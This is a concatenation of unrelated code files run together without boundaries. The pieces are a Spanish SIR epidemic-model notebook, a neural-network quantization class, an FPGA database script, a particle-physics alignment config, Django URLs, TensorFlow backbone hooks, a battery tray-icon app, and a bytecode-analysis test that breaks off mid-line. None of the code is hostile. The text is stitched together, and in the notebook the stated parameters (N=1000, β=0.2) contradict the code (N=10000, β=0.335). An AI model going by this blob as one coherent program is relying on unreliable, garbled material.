enfermedad: un individuo infectado entra en contacto con otros $\beta \cdot N$ individuos por unidad de tiempo (de los cuales la fracción que es susceptible a contraer la enfermedad es $S/N$) $\gamma$ es la tasa de recuperación media: es decir, $\frac{1}{\gamma}$ es el período de tiempo promedio durante el cual un individuo infectado puede transmitirlo. # Además hemos incluido el caso de decesos, los que representamos con el factor $\mu$. # Las ecuaciones diferenciales que describen este modelo fueron derivadas primero por Kermack y McKendrick [Proc.R.Soc.A,115,772(1927)]: # # $$\frac{dS}{dt}=−\beta \cdot \frac{S \cdot I}{N}$$ # # $$ \frac{dI}{dt} =\beta \cdot \frac{S\cdot I}{N}−\gamma \cdot I - \mu \cdot I$$ # # $$\frac{dR}{dt} = \gamma \cdot I $$ # # $$\frac{dr}{dt} = \mu \cdot I $$ # # El siguiente código de Python integra estas ecuaciones para una enfermedad caracterizada por los parámetros β = 0.2, 1/γ = 10 [dias] en una población de N = 1000 (quizás 'gripe en una escuela). # # El modelo se inicia con una sola persona infectada el día 0: I( 0 ) = 1. # # Las curvas trazadas de S(t), I(t) y R(t) están diseñados para ver los resultados obtenidos. # In[37]: import numpy as np from scipy.integrate import odeint import matplotlib.pyplot as plt # In[10]: # Una cuadrícula de puntos de tiempo (en días). t = np.linspace(0, 160, 160) # In[15]: # Las ecuaciones diferenciales del modelo SIR. def deriv(y, t, N, beta, gamma, mu): S, I, R, r = y dSdt = -beta * S * I / N dIdt = beta * S * I / N - gamma * I - mu * I dRdt = gamma * I drdt = mu * I return dSdt, dIdt, dRdt, drdt # In[16]: # Población total, N. N = 10000 # Número inicial de individuos infectados, recuperados y fallecidos, I0, R0 y r0. I0, R0, r0 = 1, 0, 0 # Todos los demás, S0, son susceptibles a la infección inicialmente. S0 = N - I0 - R0 - r0 # In[36]: # beta: tasa media de contacto, # gamma (en 1/dias): tasa media de recuperación. 
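# (Added, hedged note: because infections here end either by recovery or by
#  death, the basic reproduction number is R0 = beta / (gamma + mu); with the
#  values assigned just below, R0 ~= 0.335 / (1/14 + 0.006) ~= 4.3, which is
#  why the infected curve peaks so sharply in the plot at the end.)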
# mu: tasa media de decesos # 0.28 beta, gamma, mu = 0.335, 1./14, 0.006 # In[ ]: # Vector de condiciones iniciales y0 = S0, I0, R0, r0 # In[18]: # Integra las ecuaciones SIR sobre la cuadrícula de tiempo, t. ret = odeint(deriv, y0, t, args=(N, beta, gamma, mu)) S, I, R, r = ret.T # In[35]: # Grafico los datos en tres curvas separadas para S(t), I(t) y R(t) with plt.style.context('seaborn'): plt.plot(t, S, 'b', alpha=0.5, lw=2, label='Susceptibles') plt.plot(t, I, 'r', alpha=0.5, lw=2, label='Infectados') plt.plot(t, R, 'g', alpha=0.5, lw=2, label='Recuperados con inmunidad') plt.plot(t, r, 'k', alpha=0.5, lw=2, label='Decesos') plt.xlabel('Tiempo [días]') plt.ylabel('Número ('+str(N)+'%)') plt.ylim(-N/20,N*1.1) plt.xlim(0, 120) plt.grid(b=True, which='major', c='w', lw=2, ls='-') plt.legend(loc= 'upper left', prop={'size': 16}) plt.show() uniq.py10-100 import numpy as np import torch.nn as nn import actquant import quantize def save_state(self, _): self.full_parameters = {} layers_list = self.layers_list() layers_steps = self.layers_steps() self.full_parameters = quantize.backup_weights(layers_list, {}) if self.quant and not self.training and not self.statistics_phase: for i in range(len(layers_steps)): self.quantize.quantize_uniform_improved(layers_steps[i]) if self.quantize.hardware_clamp: self.quantize.assign_act_clamp_during_val(layers_list) self.quantize.assign_weight_clamp_during_val(layers_list) elif self.quant and self.training: if self.allow_grad: for i in range(self.quant_stage_for_grads): self.quantize.quantize_uniform_improved(layers_steps[i]) else: if self.noise: self.quantize.add_improved_uni_noise(layers_steps[self.training_stage]) for i in range(self.training_stage): self.quantize.quantize_uniform_improved(layers_steps[i]) def restore_state(self, _, __): layers_list = self.layers_list() quantize.restore_weights(layers_list, self.full_parameters) class UNIQNet(nn.Module): def __init__(self, quant_epoch_step,quant_start_stage, quant=False, noise=False, bitwidth=32, step=2, quant_edges=True, act_noise=True, step_setup=[15, 9], act_bitwidth=32, act_quant=False, uniq=False, std_act_clamp=5, std_weight_clamp=3.45, wrpn=False,quant_first_layer=False, num_of_layers_each_step=1, noise_mask=0.05): super(UNIQNet, self).__init__() self.quant_epoch_step = quant_epoch_step self.quant_start_stage = quant_start_stage self.quant = quant self.noise = noise self.wrpn = wrpn if isinstance(bitwidth, list): assert (len(bitwidth) == step) self.bitwidth = bitwidth else: self.bitwidth = [bitwidth for _ in range(step)] self.training_stage = 0 self.step = step self.num_of_layers_each_step = num_of_layers_each_step self.act_noise = act_noise self.act_quant = act_quant self.act_bitwidth = act_bitwidth self.quant_edges = quant_edges self.quant_first_layer = quant_first_layer self.register_forward_pre_hook(save_state) self.register_forward_hook(restore_state) self.layers_b_dict = None self.noise_mask_init = 0. 
if not noise else noise_mask self.quantize = quantize.quantize(bitwidth, self.act_bitwidth, None, std_act_clamp=std_act_clamp, std_weight_clamp=std_weight_clamp, noise_mask=self.noise_mask_init) self.statistics_phase = False self.allow_grad = False self.random_noise_injection = False self.open_grad_after_each_stage = True self.quant_stage_for_grads = quant_start_stage self.noise_level = 0 self.noise_batch_counter = 0 def layers_list(self): modules_list = list(self.modules()) quant_layers_list = [x for x in modules_list if isinstance(x, nn.Conv2d) or isinstance(x, nn.Linear) or isinstance(x, actquant.ActQuant) or isinstance(x, actquant.ActQuantDeepIspPic) or isinstance(x, actquant.ActQuantWRPN) or isinstance(x, nn.BatchNorm2d)] if not self.quant_edges: if self.act_quant: quant_layers_list[-2].quant = False quant_layers_list = quant_layers_list[1:-2] else: quant_layers_list = quant_layers_list[1:-1] else: if not self.quant_first_layer: quant_layers_list = quant_layers_list[1:] #remove first weight. this mode quant last layer, but not first return quant_layers_list def layers_steps(self): split_layers = self.split_one_layer_with_parameter_in_step() return split_layers def count_of_parameters_layer_in_list(self,list): counter = 0 for layer in list: if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear): counter += 1 return counter def split_one_layer_with_parameter_in_step(self): layers = self.layers_list() splited_layers = [] split_step = [] for layer in layers: if (isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear)) and self.count_of_parameters_layer_in_list(split_step) == self.num_of_layers_each_step: splited_layers.append(split_step) split_step = [] split_step.append(layer) else: split_step.append(layer) #add left layers if len(split_step) > 0: splited_layers.append(split_step) return splited_layers def switch_stage(self, epoch_progress): """ Switches the stage of network to the next one. :return: """ layers_steps = self.layers_steps() max_stage = len( layers_steps ) if self.training_stage >= max_stage + 1: return if self.open_grad_after_each_stage == False: if (np.floor(epoch_progress / self.quant_epoch_step) + self.quant_start_stage > self.training_stage and self.training_stage < max_stage - 1): self.training_stage += 1 print("Switching stage, new stage is: ", self.training_stage) for step in layers_steps[:self.training_stage]: for layer in step: if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear)\ or isinstance(layer, nn.BatchNorm2d): for param in layer.parameters(): param.requires_grad = False elif isinstance(layer, actquant.ActQuant) or isinstance(layer, actquant.ActQuantDeepIspPic) or isinstance(layer, actquant.ActQuantWRPN): layer.quatize_during_training = True layer.noise_during_training = False if self.act_noise: for layer in layers_steps[self.training_stage]: # Turn on noise only for current stage if isinstance(layer, actquant.ActQuant) or isinstance(layer, actquant.ActQuantDeepIspPic) or isinstance(layer, actquant.ActQuantWRPN): layer.noise_during_training = True return True elif (np.floor(epoch_progress / self.quant_epoch_step) + self.quant_start_stage > max_stage - 1 and self.allow_grad == False): self.allow_grad = True self.quant_stage_for_grads = self.training_stage + 1 self.random_noise_injection = False print("Switching stage, allowing all grad to propagate. 
new stage is: ", self.training_stage) for step in layers_steps[:self.training_stage]: for layer in step: if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear): for param in layer.parameters(): param.requires_grad = True return True return False else: if (np.floor( epoch_progress / self.quant_epoch_step) + self.quant_start_stage > self.training_stage and self.training_stage < max_stage - 1): self.training_stage += 1 print("Switching stage, new stage is: ", self.training_stage) for step in layers_steps[:self.training_stage]: for layer in step: if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear)\ or isinstance(layer, nn.BatchNorm2d): for param in layer.parameters(): param.requires_grad = True elif isinstance(layer, actquant.ActQuant) or isinstance(layer, actquant.ActQuantDeepIspPic) or isinstance(layer, actquant.ActQuantWRPN): layer.quatize_during_training = True layer.noise_during_training = False if self.act_noise: for layer in layers_steps[self.training_stage]: # Turn on noise only for current stage if isinstance(layer, actquant.ActQuant) or isinstance(layer, actquant.ActQuantDeepIspPic) or isinstance(layer, actquant.ActQuantWRPN): layer.noise_during_training = True self.allow_grad = False return True if (np.floor(epoch_progress / self.quant_epoch_step) + self.quant_start_stage > max_stage - 1 and self.allow_grad == False): self.allow_grad = True self.quant_stage_for_grads = self.training_stage + 1 self.random_noise_injection = False print("Switching stage, allowing all grad to propagate. new stage is: ", self.training_stage) return False import dbcopy import pytrellis def main(): pytrellis.load_database("../../database") dbcopy.dbcopy("ECP5", "LFE5U-25F", "BMID_0V", "BMID_0H") dbcopy.dbcopy("ECP5", "LFE5U-25F", "BMID_2V", "BMID_2") if __name__ == "__main__": main() # Author : # Date : July 19th, 2007 # last update: $Date: 2010/03/17 18:17:34 $ by $Author: mussgill $ import FWCore.ParameterSet.Config as cms # DCS partitions # "EBp","EBm","EEp","EEm","HBHEa","HBHEb","HBHEc","HF","HO","RPC" # "DT0","DTp","DTm","CSCp","CSCm","CASTOR","TIBTID","TOB","TECp","TECm" # "BPIX","FPIX","ESp","ESm" import DPGAnalysis.Skims.skim_detstatus_cfi ALCARECOTkAlCosmicsDCSFilter = DPGAnalysis.Skims.skim_detstatus_cfi.dcsstatus.clone( DetectorType = cms.vstring('TIBTID','TOB','TECp','TECm','BPIX','FPIX'), ApplyFilter = cms.bool(True), AndOr = cms.bool(True), DebugOn = cms.untracked.bool(False) ) #________________________________Track selection____________________________________ # AlCaReco for track based alignment using Cosmic muons reconstructed by Combinatorial Track Finder import Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi ALCARECOTkAlCosmicsCTF = Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi.AlignmentTrackSelector.clone( src = 'ctfWithMaterialTracksP5', filter = True, applyBasicCuts = True, ptMin = 0., ##10 ptMax = 99999., pMin = 4., ##10 pMax = 99999., etaMin = -99., ##-2.4 keep also what is going through... 
etaMax = 99., ## 2.4 ...both TEC with flat slope nHitMin = 7, nHitMin2D = 2, chi2nMax = 999999., applyMultiplicityFilter = False, applyNHighestPt = True, ## select only highest pT track nHighestPt = 1 ) # AlCaReco for track based alignment using Cosmic muons reconstructed by Cosmic Track Finder # (same cuts) ALCARECOTkAlCosmicsCosmicTF = ALCARECOTkAlCosmicsCTF.clone( src = 'cosmictrackfinderP5' ## different for CTF ) # AlCaReco for track based alignment using Cosmic muons reconstructed by Regional Cosmic Tracking # (same cuts) ALCARECOTkAlCosmicsRegional = ALCARECOTkAlCosmicsCTF.clone( src = 'regionalCosmicTracks' ) #________________________________Sequences____________________________________ seqALCARECOTkAlCosmicsCTF = cms.Sequence(ALCARECOTkAlCosmicsCTF) seqALCARECOTkAlCosmicsCosmicTF = cms.Sequence(ALCARECOTkAlCosmicsCosmicTF) seqALCARECOTkAlCosmicsRegional = cms.Sequence(ALCARECOTkAlCosmicsRegional) frankdevelopero/django-frikr from django.conf.urls import url from django.contrib import admin from django.urls import include from users import urls as users_urls, api_urls as users_api_urls from photos import urls as photos_urls, api_urls as photos_api_url urlpatterns = [ url(r'^admin/', admin.site.urls), # Users URLs url(r'', include(users_urls)), url(r'api/', include(users_api_urls)), # Photos URLs url(r'', include(photos_urls)), url(r'api/', include(photos_api_url)), ] vghost2008/wml #coding=utf-8 import tensorflow as tf import wnnlayer as wnnl import wmodule import wml_tfutils as wmlt from collections import OrderedDict import object_detection2.od_toolkit as odt from object_detection2.config.config import global_cfg import basic_tftools as btf from object_detection2.modeling.backbone.build import BACKBONE_HOOK_REGISTRY slim = tf.contrib.slim @BACKBONE_HOOK_REGISTRY.register() class NonLocalBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) with tf.variable_scope("NonLocalBackboneHook"): for k,v in features.items(): if k[0] not in ["C","P"]: continue level = int(k[1:]) if level<=3: res[k] = v continue res[k]= wnnl.non_local_blockv1(v, inner_dims_multiplier=[1, 1, 1], normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, activation_fn=None, weighed_sum=False) return res @BACKBONE_HOOK_REGISTRY.register() class NonLocalBackboneHookV2(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) with tf.variable_scope("NonLocalBackboneHookV2"): for k,v in features.items(): if k[0] not in ["C","P"]: continue level = int(k[1:]) if level<=3: res[k] = v continue res[k]= wnnl.non_local_blockv1(v, inner_dims=[128, 128, 128], normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, n_head=2, activation_fn=None, weighed_sum=False) return res @BACKBONE_HOOK_REGISTRY.register() class NonLocalBackboneHookV3(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) self.base_size = 512 def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) 
normalizer_params['G'] = 8 with tf.variable_scope("NonLocalBackboneHookV3"): for k,v in features.items(): if k[0] not in ["C","P"]: continue level = int(k[1:]) if level<=2: res[k] = v continue h = self.base_size//(2**level) w = self.base_size//(2**level) v = wnnl.non_local_blockv4(v, inner_dims=[128, 128, 128], normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, n_head=2, activation_fn=None, weighed_sum=False, scope=f"non_localv4_{level}", size=[h,w]) res[k] = v return res @BACKBONE_HOOK_REGISTRY.register() class SPPBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def SPP(self,x): with tf.name_scope("SPP"): x0 = slim.max_pool2d(x,5,1,padding="SAME") x1 = slim.max_pool2d(x,9,1,padding="SAME") x2 = slim.max_pool2d(x,13,1,padding="SAME") return tf.concat([x,x0,x1,x2],axis=-1) def forward(self,features,batched_inputs): del batched_inputs k = list(features.keys())[-1] v = list(features.values())[-1] res = features res[k] = self.SPP(v) return res @BACKBONE_HOOK_REGISTRY.register() class SPPSmallBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def SPP(self,x): with tf.name_scope("SPP"): x0 = slim.max_pool2d(x,5,1,padding="SAME") x1 = slim.max_pool2d(x,9,1,padding="SAME") return tf.concat([x,x0,x1],axis=-1) def forward(self,features,batched_inputs): del batched_inputs k = list(features.keys())[-1] v = list(features.values())[-1] res = features res[k] = self.SPP(v) return res @BACKBONE_HOOK_REGISTRY.register() class SEBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() with tf.variable_scope("SEBackboneHook"): for k,v in features.items(): if k[0] not in ["C","P"]: continue level = int(k[1:]) if level<=3: res[k] = v continue res[k]= wnnl.se_block(v,scope=f"SE_block_{k}") return res @BACKBONE_HOOK_REGISTRY.register() class FusionBackboneHook(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn,normalizer_params= odt.get_norm(self.cfg.NORM,self.is_training) activation_fn = odt.get_activation_fn(self.cfg.ACTIVATION_FN) with tf.variable_scope("FusionBackboneHook"): del batched_inputs end_points = list(features.items()) k0,v0 = end_points[0] mfeatures = [] shape0 = wmlt.combined_static_and_dynamic_shape(v0) for k, v in end_points[1:]: net = tf.image.resize_bilinear(v,shape0[1:3]) mfeatures.append(net) net = tf.add_n(mfeatures)/float(len(mfeatures)) net = tf.concat([v0,net],axis=-1) level0 = int(k0[1:]) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=activation_fn, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth{level0}") res = features res[f'F{level0}'] = net return res @BACKBONE_HOOK_REGISTRY.register() class FusionBackboneHookV2(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn,normalizer_params= odt.get_norm(self.cfg.NORM,self.is_training) activation_fn = odt.get_activation_fn(self.cfg.ACTIVATION_FN) with tf.variable_scope("FusionBackboneHookV2"): del batched_inputs end_points = list(features.items()) k0,v0 = end_points[0] mfeatures = [] shape0 = 
wmlt.combined_static_and_dynamic_shape(v0) for k, v in end_points[1:]: net = tf.image.resize_bilinear(v,shape0[1:3]) mfeatures.append(net) net = tf.add_n(mfeatures)/float(len(mfeatures)) net = tf.concat([v0,net],axis=-1) level0 = int(k0[1:]) ''' 与上一个版本相比,输出的通道数小一些 ''' net = slim.conv2d(net, v0.get_shape().as_list()[-1], [3, 3], activation_fn=activation_fn, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth{level0}") res = features res[f'F{level0}'] = net return res @BACKBONE_HOOK_REGISTRY.register() class FusionBackboneHookV3(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn,normalizer_params= odt.get_norm(self.cfg.NORM,self.is_training) activation_fn = odt.get_activation_fn(self.cfg.ACTIVATION_FN) with tf.variable_scope("FusionBackboneHookV2"): del batched_inputs end_points = list(features.items()) k0,v0 = end_points[0] mfeatures = [] shape0 = wmlt.combined_static_and_dynamic_shape(v0) for k, v in end_points[1:]: net = tf.image.resize_bilinear(v,shape0[1:3]) mfeatures.append(net) net = tf.add_n(mfeatures)/float(len(mfeatures)) ''' 与v2相比,使用sum代替concat ''' net = v0+net level0 = int(k0[1:]) net = slim.conv2d(net, v0.get_shape().as_list()[-1], [3, 3], activation_fn=activation_fn, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth{level0}") res = features res[f'F{level0}'] = net return res @BACKBONE_HOOK_REGISTRY.register() class BalanceBackboneHook(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn,normalizer_params = odt.get_norm("evo_norm_s0",is_training=self.is_training) res = OrderedDict() with tf.variable_scope("BalanceBackboneHook"): del batched_inputs ref_index = 1 end_points = list(features.items()) k0,v0 = end_points[ref_index] mfeatures = [] with tf.name_scope("fusion"): shape0 = wmlt.combined_static_and_dynamic_shape(v0) for i,(k, v) in enumerate(end_points): if i == ref_index: net = v else: net = tf.image.resize_bilinear(v,shape0[1:3],name=f"resize{i}") mfeatures.append(net) net = tf.add_n(mfeatures)/float(len(mfeatures)) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=None, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth") for i,(k,v) in enumerate(end_points): with tf.name_scope(f"merge{i}"): shape = wmlt.combined_static_and_dynamic_shape(v) v0 = tf.image.resize_bilinear(net,shape[1:3]) res[k] = v+v0 return res @BACKBONE_HOOK_REGISTRY.register() class BalanceBackboneHookV2(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): low_features = self.parent.low_features normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) res = OrderedDict() with tf.variable_scope("BalanceBackboneHookV2"): del batched_inputs ref_index = 1 end_points = list(features.items()) k0, v0 = end_points[ref_index] mfeatures = [] with tf.name_scope("fusion"): shape0 = wmlt.combined_static_and_dynamic_shape(v0) for i, (k, v) in enumerate(end_points): if i == ref_index: net = v else: net = tf.image.resize_bilinear(v, shape0[1:3], name=f"resize{i}") mfeatures.append(net) net = tf.add_n(mfeatures) / float(len(mfeatures)) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], 
activation_fn=None, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth") for i, (k, v) in enumerate(end_points): with tf.name_scope(f"smooth_low_feature{i}"): index = int(k[1:]) low_feature = low_features[f"C{index}"] channel = v.get_shape().as_list()[-1] low_feature = slim.conv2d(low_feature,channel,[1,1],activation_fn=None, normalizer_fn=None) with tf.name_scope(f"merge{i}"): shape = wmlt.combined_static_and_dynamic_shape(v) v0 = tf.image.resize_bilinear(net, shape[1:3]) res[k] = tf.concat([v + v0,low_feature],axis=-1) return res @BACKBONE_HOOK_REGISTRY.register() class DeformConvBackboneHook(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): del batched_inputs res = OrderedDict() with tf.variable_scope("DeformConvBackboneHook"): normalizer_fn,normalizer_params = odt.get_norm("BN",is_training=self.is_training) for k,v in features.items(): if k[0] not in ["C", "P"]: continue level = int(k[1:]) channel = v.get_shape().as_list()[-1] res[k] = wnnl.deform_conv2dv2(v,num_outputs=channel,kernel_size=3, scope=f"deform_conv2d{level}", normalizer_fn=normalizer_fn, normalizer_params=normalizer_params) return res @BACKBONE_HOOK_REGISTRY.register() class MakeAnchorsForRetinaNet(wmodule.WChildModule): def __init__(self,cfg,parent,*args,**kwargs): super().__init__(cfg,parent,*args,**kwargs) self.bh = BalanceBackboneHook(cfg,parent,*args,**kwargs) def forward(self,features,batched_inputs): features = self.bh(features,batched_inputs) del batched_inputs res = OrderedDict() featuremap_keys = ["P3","P4","P5","P6","P7"] anchor_sizes = global_cfg.MODEL.ANCHOR_GENERATOR.SIZES anchor_ratios = global_cfg.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS normalizer_fn,normalizer_params = odt.get_norm("evo_norm_s0",is_training=self.is_training) ref = features[featuremap_keys[1]] ref_shape = wmlt.combined_static_and_dynamic_shape(ref)[1:3] ref_size = anchor_sizes[1][0] nr = 0 with tf.name_scope("MakeAnchorsForRetinaNet"): for i,k in enumerate(featuremap_keys): net = features[k] for j,s in enumerate(anchor_sizes[i]): for k,r in enumerate(anchor_ratios[i][j]): net = slim.separable_conv2d(net, 32, kernel_size=3, padding="SAME", depth_multiplier=1, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"sep_conv_{i}{j}{k}") target_shape = self.get_shape(ref_shape,ref_size,s,r) net = tf.image.resize_nearest_neighbor(net,target_shape) res[f"P{nr}"] = net nr += 1 return res @staticmethod @wmlt.add_name_scope def get_shape(ref_shape,ref_size,size,ratio): ref_size = tf.to_float(ref_size) size = tf.to_float(size) ref_shape = tf.to_float(ref_shape) target_shape = (ref_size/size)*ref_shape*tf.stack([tf.sqrt(ratio),tf.rsqrt(ratio)],axis=0) shape = tf.to_int32(target_shape) return tf.where(shape>0,shape,tf.ones_like(shape)) @BACKBONE_HOOK_REGISTRY.register() class BalanceBackboneHookV3(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) res = [] with tf.variable_scope("BalanceBackboneHook"): del batched_inputs ref_index = 1 end_points = list(features) v0 = end_points[ref_index] mfeatures = [] with tf.name_scope("fusion"): shape0 = wmlt.combined_static_and_dynamic_shape(v0) for i, v in enumerate(end_points): if i == ref_index: net = v else: net = tf.image.resize_bilinear(v, shape0[1:3], 
name=f"resize{i}") mfeatures.append(net) net = tf.add_n(mfeatures) / float(len(mfeatures)) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=None, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth") for i, v in enumerate(end_points): with tf.name_scope(f"merge{i}"): shape = wmlt.combined_static_and_dynamic_shape(v) v0 = tf.image.resize_bilinear(net, shape[1:3]) res.append(v + v0) return res @BACKBONE_HOOK_REGISTRY.register() class BalanceNonLocalBackboneHook(wmodule.WChildModule): def __init__(self, cfg, parent, *args, **kwargs): super().__init__(cfg, parent, *args, **kwargs) def forward(self, features, batched_inputs): normalizer_fn, normalizer_params = odt.get_norm("evo_norm_s0", is_training=self.is_training) res = OrderedDict() with tf.variable_scope("BalanceNonLocalBackboneHook"): del batched_inputs ref_index = 1 end_points = list(features.items()) k0, v0 = end_points[ref_index] mfeatures = [] with tf.name_scope("fusion"): shape0 = wmlt.combined_static_and_dynamic_shape(v0) for i, (k, v) in enumerate(end_points): if i == ref_index: net = v else: net = tf.image.resize_bilinear(v, shape0[1:3], name=f"resize{i}") mfeatures.append(net) net = tf.add_n(mfeatures) / float(len(mfeatures)) net = slim.conv2d(net, net.get_shape().as_list()[-1], [3, 3], activation_fn=None, normalizer_fn=normalizer_fn, normalizer_params=normalizer_params, scope=f"smooth") for i, (k, v) in enumerate(end_points): with tf.variable_scope(f"merge{i}"): shape = wmlt.combined_static_and_dynamic_shape(v) v0 = tf.image.resize_bilinear(net, shape[1:3]) net = v + v0 if i>0: net = wnnl.non_local_blockv1(net,inner_dims_multiplier=[1,1,1], normalizer_fn=normalizer_fn,normalizer_params=normalizer_params, activation_fn=None, weighed_sum=False) res[k] = net return res Tray_display.py from PIL import Image, ImageDraw, ImageFont import pystray import _thread import time import Battery_info class Tray_display(): icon = None battery_level = 0 battery_level_capture_rate = 30 exit_callback = None def __init__(self): self.icon = pystray.Icon('battery_level_show') self.set_menu() def set_exit_callback(self, callback_func): self.exit_callback = callback_func def exit(self): print("Exit") self.icon.stop() if(self.exit_callback): self.exit_callback() def set_menu(self): menu_item = pystray.MenuItem("Exit", lambda icon, item: self.exit()) self.icon.menu = pystray.Menu(menu_item) self.icon.update_menu() def create_icon_by_text(self, text): width = 200 height = 200 color1 = 0x000000 color2 = 0xFFFFFF image = Image.new('RGB', (width, height), color1) dc = ImageDraw.Draw(image) dc.text((0,0),text,font=ImageFont.truetype('C:/Windows/Fonts/Arial.ttf',190),fill = color2) self.icon.icon = image def run(self): self.get_battery_level() _thread.start_new_thread(self.get_battery_level_thread, ()) self.icon.run() def get_battery_level(self): self.battery_level = Battery_info.get_battery_level() self.icon.title = "battery: " + str(self.battery_level) + "%" icon_text = str(self.battery_level) if(self.battery_level == 100): icon_text = "F" self.create_icon_by_text(icon_text) def get_battery_level_thread(self): while(True): self.get_battery_level() time.sleep(self.battery_level_capture_rate) 0 # Copyright (c) 2019-2021, , , , and . # # Distributed under the 3-clause BSD license, see accompanying file LICENSE # or https://github.com/scikit-hep/vector for details. 
import collections import inspect import sys import pytest import vector.compute.lorentz import vector.compute.planar import vector.compute.spatial uncompyle6 = pytest.importorskip("uncompyle6") spark_parser = pytest.importorskip("spark_parser") Context = collections.namedtuple("Context", ["name", "closure"]) functions = dict( [ ( f'{y.__name__}({", ".join(repr(v) if isinstance(v, str) else v.__name__ for v in w)})', z[0], ) for x, y in inspect.getmembers( vector.compute.planar, predicate=inspect.ismodule ) if hasattr(y, "dispatch_map") for w, z in y.dispatch_map.items() ] + [ ( f'{y.__name__}({", ".join(repr(v) if isinstance(v, str) else v.__name__ for v in w)})', z[0], ) for x, y in inspect.getmembers( vector.compute.spatial, predicate=inspect.ismodule ) if hasattr(y, "dispatch_map") for w, z in y.dispatch_map.items() ] + [ ( f'{y.__name__}({", ".join(repr(v) if isinstance(v, str) else v.__name__ for v in w)})', z[0], ) for x, y in inspect.getmembers( vector.compute.lorentz, predicate=inspect.ismodule ) if hasattr(y, "dispatch_map") for w, z in y.dispatch_map.items() ] ) @pytest.mark.slow @pytest.mark.parametrize("signature", functions.keys()) def test(signature): analyze_function(functions[signature]) # def test(): # for signature, function in functions.items(): # print(signature) # analyze_function(function) def analyze_function(function): if function not in analyze_function.done: # print(function.__module__ + "." + function.__name__) closure = dict(function.__globals__) if function.__closure__ is not None: for var, cell in zip(function.__code__.co_freevars, function.__closure__): try: closure[var] = cell.cell_contents except ValueError: pass # the cell has not been filled yet, so ignore it analyze_code(function.__code__, Context(function.__name__, closure)) analyze_function.done.add(function) analyze_function.done = set() def analyze_code(code, context): # this block is all uncompyle6 python_version = float(sys.version[0:3]) is_pypy = "__pypy__" in sys.builtin_module_names parser = uncompyle6.parser.get_python_parser( python_version, debug_parser=dict(spark_parser.DEFAULT_DEBUG), compile_mode="exec", is_pypy=is_pypy, ) scanner = uncompyle6.scanner.get_scanner(python_version, is_pypy=is_pypy) tokens, customize = scanner.ingest(code, code_objects={}, show_asm=False) parsed = uncompyle6.parser.parse(parser, tokens, customize, code) # now the disassembled bytecodes have been parsed into a tree for us to walk analyze_body(parsed, context) def analyze_body(node, context): assert node.kind == "stmts" assert len(node) >= 1 for statement in node[:-1]: analyze_assignment(statement, context) analyze_return(node[-1], context) def analyze_assignment(node, context): assert node.kind == "sstmt" assert len(node) == 1 assert ( node[0].kind == "assign" ), "only assignments and a final 'return' are allowed (and not tuple-assignment)" assert len(node[0]) == 2 assert node[0][1].kind == "store" if node[0][1][0].kind == "STORE_FAST": analyze_expression(expr(node[0][0]), context) elif node[0][1][0].kind == "unpack": assert len(node[0][1][0]) >= 2 assert node[0][1][0][0].kind.startswith("UNPACK_SEQUENCE") for item in node[0][1][0][1:]: assert item.kind 